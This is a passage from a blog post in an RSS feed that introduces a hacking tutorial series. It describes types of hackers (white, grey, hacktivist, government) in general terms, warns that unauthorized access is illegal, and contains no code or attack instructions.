trojans and malware and create botnets to do their bidding. They cost the hardworking and honest people around the world billions of dollars each year. Some do it out of greed, some do it to show off while some others just want to watch the world burn.</p><h3 id="white-hat">White hat</h3><p>White hat hackers are the good guys who hack for improving the security of systems. The field of penetration testing involves probing a system, say a website or a company&#x2019;s internal network, to look for vulnerabilities. The white hats (or penetration testers) find these security flaws and help the developers fix them. While the majority of the hacking process is the same for white hats and black hats, there&#x2019;s a world of difference when it comes to their intentions. White hats want to help patch up vulnerabilities whereas black hats want to exploit them.</p><p>Software security is one of the fastest growing fields today. More and more companies are hiring security specialists as well as offering bug bounty programs. Whether you simply want a hobby or wish to go further, the world of cyber security has you covered.</p><h3 id="grey-hat-hackers">Grey hat hackers</h3><p>These are the hackers who may work offensively or defensively depending on the situation. Hackers who don&#x2019;t have malicious intentions but still like to break into third-party system just for the thrill and fun or maybe just to announce a newfound vulnerability in a wild and supposedly heroic way.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2020/12/zuckerberg.jpg" class="kg-image" alt="Types of Hackers" loading="lazy" width="1120" height="746"><figcaption>Mark got Hacked</figcaption></figure><p>Remember, breaking into a company&#x2019;s internal network without authorization or taking a peek at a private database just for fun is just as bad as malicious hacking in the eyes of the law.</p><h3 id="hacktivists">Hacktivists</h3><p>These are the hackers who use their skills as a means of protesting against injustice and protecting human rights such as free speech. They attack a system or website to popularize a notion or gather attention to a specific case for rectification. They are vigilantes, the dark knights of the hacking universe. This is where good intentions collide with the law, for hacktivists may or may not carry out illegal activities to get their point across to the world. They are outlaws who deliver their own brand of rough justice. <a href="https://en.wikipedia.org/wiki/Operation_Payback">Anonymous</a>, <a href="https://en.wikipedia.org/wiki/LulzSec">LulzSec</a> and <a href="https://wikileaks.org/">WikiLeaks</a> are a few notable hacktivist groups.</p><h3 id="government">Government</h3><p>The potential consequences of government hacking are so enormous and far reaching that I feel compelled to put them in a different category. Imagine an adversary that not only has access to billions of dollars but also decides the laws in your country. An adversary who wants control over every aspect of your life. How do you defend against such an opponent?</p><p>This is increasingly becoming a global problem. Instead of protecting the human right to privacy, governments around the world are opting to violate it, following in the footsteps of <a href="https://en.wikipedia.org/wiki/National_Security_Agency">NSA</a> and <a href="https://en.wikipedia.org/wiki/Government_Communications_Headquarters">GCHQ</a>. In the coming tutorials, protecting your privacy is going to be an ever-present concern for us.</p><h3 id="you">You</h3><p>What about you? Which side are you on? Decided anything yet? Don&#x2019;t worry, you&#x2019;ll have plenty of time to figure it out. Every single one of the above types of hackers make use of the same hacking techniques. They all start out the same way, they all learn the same things but they end up in vastly different places. No matter what you pick, remember that hacking is a practical field and you will be on the front lines.</p><p>Now let us begin our journey by learning how to create viruses. But before we can do that, let&#x2019;s get you all <a href="https://blog.leewardslope.comsetting-up-a-virtual-machine-to-practice-hacking/">set up with a virtual machine</a> so that you don&#x2019;t accidentally wreck your computer. Safety first, right?</p>]]></content:encoded></item></channel></rss>